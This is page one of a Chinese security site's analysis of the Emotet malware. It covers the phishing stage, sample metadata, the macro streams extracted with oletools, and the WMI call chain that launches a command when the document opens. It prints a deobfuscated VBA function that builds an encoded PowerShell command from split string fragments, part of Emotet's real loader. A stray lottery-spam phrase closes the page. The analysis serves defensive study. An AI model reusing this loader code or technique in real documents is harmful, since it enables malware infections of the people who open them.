歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

深入分析惡意軟件Emotet

來源:本站整理 作者:佚名 時間:2019-04-16 TAG: 我要投稿

研究發現,Emotet惡意軟件的攻擊活動是分為多個階段完成的,在本文中,我們首先為讀者介紹其攻擊活動的第1階段和第2階段,并重點講解與網絡釣魚和在受感染的系統中實現持久性控制的相關內容。實際上Emotet是通過包含惡意鏈接或附件的網絡釣魚電子郵件進行傳播的,釣魚的對象包括個人、公司和政府部門。
第1階段:惡意電子郵件與惡意文檔。
攻擊的第1階段始于網絡釣魚電子郵件。通常情況下,攻擊者會定期修改釣魚郵件的主題、布局、附件和鏈接。在本文中,我們將分析取自VirusTotal網站的惡意軟件樣本。

Emotet的一大特點是會不斷變換網絡釣魚電子郵件的內容,包括惡意鏈接以及相應的附件。在本文中,我們分析的是通過以下鏈接傳播的樣本:

用戶一旦點擊了上述URL,就會下載一個包含宏指令的Microsoft Office文檔。

樣本分析
我們使用file命令分析樣本后發現,這個文檔有1頁,并且不包含任何單詞。
f5e9c63713c7ff968f4958a9b5161e78af05f21493e56555734b89f55b2be24c: Composite Document File V2 Document, Little Endian,
Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word,
Create Time/Date: Mon Mar 11 21:32:00 2019, Last Saved Time/Date: Mon Mar 11 21:32:00 2019, Number of Pages: 1,
Number of Words: 0, Number of Characters: 5, Security: 0
使用Oletools獲取文檔對象列表后,我們發現了3個宏元素:
  7:        74 'Macros/PROJECTwm'
  8: M   70540 'Macros/VBA/S1ADDQ1A'
  9: M   14650 'Macros/VBA/YBB1wA'
 10:     49987 'Macros/VBA/_VBA_PROJECT'
 11:      1344 'Macros/VBA/__SRP_0'
 12:       110 'Macros/VBA/__SRP_1'
 13:       436 'Macros/VBA/__SRP_2'
 14:       187 'Macros/VBA/__SRP_3'
 15:       601 'Macros/VBA/dir'
 16: M    9719 'Macros/VBA/mA4QAX4'
 17:      4096 'WordDocument'
提取代碼
由于對象8、9和16中含有Visual Basic代碼,因此,我們有必要對其做進一步的分析。

在提取得到的代碼中,mA4QAX4是入口點,一旦打開文檔,就會從這里開始執行。另外,所有的VBS代碼都經過了模糊處理,具體如下圖所示。

由于這三部分是相互依賴的,為了進一步分析它們,必須首先將其合并,相應的代碼可以從這里下載。
調用鏈如下所示:
1、autoopen();
2、iQwUcAAU(param):
· 創建Win32_ProcessStartup類;
· 通過調用Create方法為該類生成對象;
· 將param字符串作為命令參數傳遞,從而開始執行;
其中,param的值由以下函數的運行結果連接組成:SQoBUAA、vDXBUQ、rDCAQQcA、pAADAADD、k1kGUAB與cAABQDw。所有這些函數,在邏輯方面都非常相似,所以,在去混淆的時候相對不難。以下是SQoBUAA函數去混淆后的代碼:
Function SQoBUAA()
On Error Resume Next
jkQBUx = "l -" + "nop" + " -e" + "n" + "c" + " JA" + "BHA" + "G" + "8Aa" + "wB" + "HA" + "E" + "M" + "AN" + "A" + "B" + "B" + "A" + "D" + "QA" + "PQ" + "A" + "oAC"
lBADQoU = "cAe" + "gBf" + "AC" + "cAK" + "w" + "An" + "AEE" + "AWg" + "AnA" + "CsA" + "Jw" + "Br" + "A" + "G8A" + "RAB"
tcoAAAAQ = "B" + "ACc" + "A" + "K" + "Q" + "A7A" + "CQ" + "AU" + "gBf" + "AEE" + "A" + "a" + "w" + "AxA" + "F8"
HAQUxA_ = "AQQ" + "BBA" + "D0" + "Abg" + "BlA" + "Hc" + "ALQ" + "BvA" + "GI" + "Aa" + "gBl" + "AG" + "MAd" + "A" + "AgA" + "E" + "4" + "A" + "Z" + "QB0" + "A" + "C" + "4A" + "VwB" + "lAG"

[1] [2] [3] [4]  下一頁

【聲明】:黑吧安全網(http://www.pcpbjo.tw)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        云南快乐十分前三电视